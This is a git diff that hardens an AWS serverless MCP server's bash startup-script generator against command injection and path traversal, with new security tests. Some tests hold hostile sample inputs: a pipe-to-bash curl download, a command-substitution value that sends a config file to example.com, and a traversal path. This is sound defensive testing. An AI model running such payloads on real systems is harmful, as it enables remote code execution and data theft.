diff --git a/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py b/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py
index f8520de72a..191eaf873b 100644
--- a/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py
+++ b/src/aws-serverless-mcp-server/awslabs/aws_serverless_mcp_server/tools/webapps/utils/startup_script_generator.py
@@ -19,6 +19,8 @@
 """
 
 import os
+import re
+import shlex
 import stat
 from loguru import logger
 from typing import Dict, Optional
@@ -68,10 +70,26 @@ async def generate_startup_script(
     """
     startup_script_name = startup_script_name or get_default_startup_script_name(runtime)
     script_path = os.path.join(built_artifacts_path, startup_script_name)
-    entry_point_path = os.path.join(built_artifacts_path, entry_point)
 
     logger.info(f'Generating startup script for runtime: {runtime}, entry point: {entry_point}')
 
+    # Validate entry_point BEFORE checking file existence
+    validate_entry_point(entry_point)
+
+    # Validate environment variables if provided
+    if additional_env:
+        validate_environment_variables(additional_env)
+
+    # Check for path traversal attacks
+    entry_point_path = os.path.join(built_artifacts_path, entry_point)
+    resolved_entry_point = os.path.realpath(entry_point_path)
+    resolved_artifacts_path = os.path.realpath(built_artifacts_path)
+
+    if not resolved_entry_point.startswith(resolved_artifacts_path + os.sep):
+        raise ValueError(
+            'Path traversal detected: entry_point resolves outside built_artifacts_path'
+        )
+
     # Check if entry point exists
     if not os.path.exists(entry_point_path):
         error = EntryPointNotFoundError(entry_point, built_artifacts_path)
@@ -121,6 +139,45 @@ def get_default_startup_script_name(runtime: str) -> str:
     return 'bootstrap'
 
 
+def validate_entry_point(entry_point: str) -> None:
+    """Validate entry point against allowlist regex to prevent command injection.
+
+    Args:
+        entry_point: Application entry point to validate
+
+    Raises:
+        ValueError: If entry point contains invalid characters
+    """
+    # Allowlist: only alphanumeric, dots, underscores, hyphens, and forward slashes.
+    # fullmatch is used because '$' in re.match also matches before a trailing newline.
+    if not re.fullmatch(r'[a-zA-Z0-9._/-]+', entry_point):
+        raise ValueError(
+            'Entry point contains invalid characters. Only alphanumeric characters, dots, underscores, hyphens, and forward slashes are allowed.'
+        )
+
+
+def validate_environment_variables(additional_env: Dict[str, str]) -> None:
+    """Validate environment variable keys and values.
+
+    Args:
+        additional_env: Dictionary of environment variables to validate
+
+    Raises:
+        ValueError: If any key or value is invalid
+    """
+    for key, value in additional_env.items():
+        # Environment variable keys should follow POSIX naming conventions; fullmatch
+        # (rather than '$') also rejects a trailing newline, since keys are emitted unquoted
+        if not re.fullmatch(r'[a-zA-Z_][a-zA-Z0-9_]*', key):
+            raise ValueError(
+                'Environment variable key must start with a letter or underscore and contain only alphanumeric characters and underscores'
+            )
+
+        # Check for null bytes in values which can cause issues
+        if '\0' in value:
+            raise ValueError('Environment variable value contains null bytes')
+
+
 def generate_script_content(
     runtime: str, entry_point: str, additional_env: Optional[Dict[str, str]] = None
 ) -> str:
@@ -132,25 +189,30 @@ def generate_script_content(
         additional_env: Additional environment variables
 
     Returns:
-        str: Script content
+        str: Script content with properly escaped values
     """
-    # Generate environment variables setup
+    # Sanitize entry_point to prevent command injection
+    safe_entry_point = shlex.quote(entry_point)
+
+    # Generate environment variables setup with proper escaping
     env_setup = ''
     if additional_env:
         env_vars = []
         for key, value in additional_env.items():
-            env_vars.append(f'export {key}="{value}"')
+            # Key is already validated, but value needs escaping
+            safe_value = shlex.quote(value)
+            env_vars.append(f'export {key}={safe_value}')
         env_setup = '\n'.join(env_vars) + '\n\n'
 
     if runtime.startswith('nodejs'):
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec node {entry_point}
+exec node {safe_entry_point}
 """
     elif runtime.startswith('python'):
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec python {entry_point}
+exec python {safe_entry_point}
 """
     elif runtime.startswith('java'):
         # Determine if it's a JAR file or a class
@@ -159,31 +221,31 @@ def generate_script_content(
         if is_jar:
             return f"""#!/bin/bash
 {env_setup}# Start the application
-exec java -jar {entry_point}
+exec java -jar {safe_entry_point}
 """
         else:
             return f"""#!/bin/bash
 {env_setup}# Start the application
-exec java {entry_point}
+exec java {safe_entry_point}
 """
     elif runtime.startswith('dotnet'):
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec dotnet {entry_point}
+exec dotnet {safe_entry_point}
 """
     elif runtime.startswith('go'):
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec ./{entry_point}
+exec ./{safe_entry_point}
 """
     elif runtime.startswith('ruby'):
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec ruby {entry_point}
+exec ruby {safe_entry_point}
 """
     else:
         # Generic script for unknown runtimes
         return f"""#!/bin/bash
 {env_setup}# Start the application
-exec {entry_point}
+exec {safe_entry_point}
 """
diff --git a/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py b/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py
index 0e990fd37c..9b3f48e906 100644
--- a/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py
+++ b/src/aws-serverless-mcp-server/tests/test_startup_script_generator.py
@@ -74,8 +74,8 @@ def test_generate_script_content_nodejs_with_env(self):
         result = generate_script_content(runtime, entry_point, additional_env)
 
         expected = """#!/bin/bash
-export NODE_ENV="production"
-export PORT="3000"
+export NODE_ENV=production
+export PORT=3000
 
 # Start the application
 exec node server.js
@@ -104,8 +104,8 @@ def test_generate_script_content_python_with_env(self):
         result = generate_script_content(runtime, entry_point, additional_env)
 
         expected = """#!/bin/bash
-export PYTHONPATH="/app"
-export DEBUG="true"
+export PYTHONPATH=/app
+export DEBUG=true
 
 # Start the application
 exec python main.py
@@ -274,10 +274,10 @@ async def test_generate_startup_script_with_env_vars(self):
 
             assert result == 'bootstrap'
 
-            # Verify script content includes environment variables
+            # Verify script content includes environment variables (shlex.quote format)
             written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list)
-            assert 'export NODE_ENV="production"' in written_content
-            assert 'export PORT="8080"' in written_content
+            assert 'export NODE_ENV=production' in written_content
+            assert 'export PORT=8080' in written_content
 
     @pytest.mark.asyncio
     async def test_generate_startup_script_entry_point_not_found(self):
@@ -369,11 +369,11 @@ def test_generate_script_content_environment_variable_escaping(self):
 
         result = generate_script_content(runtime, entry_point, additional_env)
 
-        # All values should be wrapped in double quotes
-        assert 'export SIMPLE_VAR="value"' in result
-        assert 'export VAR_WITH_QUOTES="value with "quotes""' in result
-        assert 'export VAR_WITH_SPACES="value with spaces"' in result
-        assert 'export VAR_WITH_SPECIAL="value$with&special*chars"' in result
+        # shlex.quote() leaves simple values unquoted and wraps complex values in single quotes
+        assert 'export SIMPLE_VAR=value' in result
+        assert 'export VAR_WITH_QUOTES=\'value with "quotes"\'' in result
+        assert "export VAR_WITH_SPACES='value with spaces'" in result
+        assert "export VAR_WITH_SPECIAL='value$with&special*chars'" in result
 
     @pytest.mark.asyncio
     async def test_generate_startup_script_file_write_error(self):
@@ -408,3 +408,183 @@ async def test_generate_startup_script_chmod_error(self):
         ):
             with pytest.raises(OSError, match='Permission denied'):
                 await generate_startup_script(runtime, entry_point, built_artifacts_path)
+
+    # Security tests for command injection vulnerabilities.
+
+    @pytest.mark.asyncio
+    async def test_entry_point_command_injection_blocked(self):
+        """Test that entry_point with command injection attempts is rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js; curl http://example.com/script.sh | bash'
+        built_artifacts_path = '/dir/artifacts'
+
+        with patch('os.path.exists', return_value=True):
+            with pytest.raises(ValueError, match='Entry point contains invalid characters'):
+                await generate_startup_script(runtime, entry_point, built_artifacts_path)
+
+    @pytest.mark.asyncio
+    async def test_entry_point_path_traversal_blocked(self):
+        """Test that path traversal in entry_point is rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = '../../../system/config'
+        built_artifacts_path = '/dir/artifacts'
+
+        with patch('os.path.exists', return_value=True):
+            with pytest.raises(
+                ValueError,
+                match='(Entry point contains invalid characters|Path traversal detected)',
+            ):
+                await generate_startup_script(runtime, entry_point, built_artifacts_path)
+
+    @pytest.mark.asyncio
+    async def test_env_variable_command_substitution_escaped(self):
+        """Test that command substitution in environment variables is properly escaped."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js'
+        built_artifacts_path = '/dir/artifacts'
+        additional_env = {'DB_URL': '$(curl example.com/data?query=$(cat /path/to/config))'}
+
+        mock_file = mock_open()
+        mock_stat_result = MagicMock()
+        mock_stat_result.st_mode = 0o644
+
+        with (
+            patch('os.path.exists', return_value=True),
+            patch('os.path.realpath', side_effect=lambda x: x),
+            patch('builtins.open', mock_file),
+            patch('os.stat', return_value=mock_stat_result),
+            patch('os.chmod'),
+        ):
+            await generate_startup_script(
+                runtime, entry_point, built_artifacts_path, additional_env=additional_env
+            )
+
+            written_content = ''.join(call.args[0] for call in mock_file().write.call_args_list)
+            # Single quotes prevent command substitution in bash
+            assert "'$(curl example.com/data?query=$(cat /path/to/config))'" in written_content
+            # Ensure it's not in double quotes (which would allow execution)
+            assert '"$(curl example.com/data?query=$(cat /path/to/config))"' not in written_content
+
+    @pytest.mark.asyncio
+    async def test_env_variable_invalid_key_rejected(self):
+        """Test that environment variable keys with invalid characters are rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js'
+        built_artifacts_path = '/dir/artifacts'
+        additional_env = {
+            'INVALID-KEY': 'value'  # Hyphens not allowed in POSIX env var names
+        }
+
+        with (
+            patch('os.path.exists', return_value=True),
+            patch('os.path.realpath', side_effect=lambda x: x),
+        ):
+            with pytest.raises(
+                ValueError, match='Environment variable key must start with a letter'
+            ):
+                await generate_startup_script(
+                    runtime, entry_point, built_artifacts_path, additional_env=additional_env
+                )
+
+    @pytest.mark.asyncio
+    async def test_env_variable_null_byte_rejected(self):
+        """Test that environment variable values with null bytes are rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js'
+        built_artifacts_path = '/dir/artifacts'
+        additional_env = {'DB_URL': 'value\x00malicious'}
+
+        with (
+            patch('os.path.exists', return_value=True),
+            patch('os.path.realpath', side_effect=lambda x: x),
+        ):
+            with pytest.raises(ValueError, match='Environment variable value contains null bytes'):
+                await generate_startup_script(
+                    runtime, entry_point, built_artifacts_path, additional_env=additional_env
+                )
+
+    @pytest.mark.asyncio
+    async def test_valid_entry_point_accepted(self):
+        """Test that valid entry_point values are accepted."""
+        runtime = 'nodejs18.x'
+        entry_points = [
+            'app.js',
+            'src/app.js',
+            'dist/server.js',
+            'app-server.js',
+            'app_server.js',
+            './app.js',
+        ]
+        built_artifacts_path = '/dir/artifacts'
+
+        mock_file = mock_open()
+        mock_stat_result = MagicMock()
+        mock_stat_result.st_mode = 0o644
+
+        for entry_point in entry_points:
+            with (
+                patch('os.path.exists', return_value=True),
+                patch('builtins.open', mock_file),
+                patch('os.stat', return_value=mock_stat_result),
+                patch('os.chmod'),
+                patch('os.path.realpath', side_effect=lambda x: x),
+            ):
+                result = await generate_startup_script(runtime, entry_point, built_artifacts_path)
+                assert result == 'bootstrap'
+
+    @pytest.mark.asyncio
+    async def test_valid_env_variables_accepted(self):
+        """Test that valid environment variables are accepted."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js'
+        built_artifacts_path = '/dir/artifacts'
+        additional_env = {
+            'NODE_ENV': 'production',
+            'PORT': '3000',
+            'DB_HOST': 'localhost',
+            '_PRIVATE_VAR': 'value',
+            'VAR123': 'value',
+        }
+
+        mock_file = mock_open()
+        mock_stat_result = MagicMock()
+        mock_stat_result.st_mode = 0o644
+
+        with (
+            patch('os.path.exists', return_value=True),
+            patch('os.path.realpath', side_effect=lambda x: x),
+            patch('builtins.open', mock_file),
+            patch('os.stat', return_value=mock_stat_result),
+            patch('os.chmod'),
+        ):
+            result = await generate_startup_script(
+                runtime, entry_point, built_artifacts_path, additional_env=additional_env
+            )
+            assert result == 'bootstrap'
+
+    @pytest.mark.asyncio
+    async def test_entry_point_trailing_newline_rejected(self):
+        """Test that an entry_point ending in a newline is rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js\n'
+        built_artifacts_path = '/dir/artifacts'
+
+        with patch('os.path.exists', return_value=True):
+            with pytest.raises(ValueError, match='Entry point contains invalid characters'):
+                await generate_startup_script(runtime, entry_point, built_artifacts_path)
+
+    @pytest.mark.asyncio
+    async def test_env_variable_key_trailing_newline_rejected(self):
+        """Test that an environment variable key ending in a newline is rejected."""
+        runtime = 'nodejs18.x'
+        entry_point = 'app.js'
+        built_artifacts_path = '/dir/artifacts'
+        additional_env = {'PORT\n': '3000'}
+
+        with patch('os.path.exists', return_value=True):
+            with pytest.raises(
+                ValueError, match='Environment variable key must start with a letter'
+            ):
+                await generate_startup_script(
+                    runtime, entry_point, built_artifacts_path, additional_env=additional_env
+                )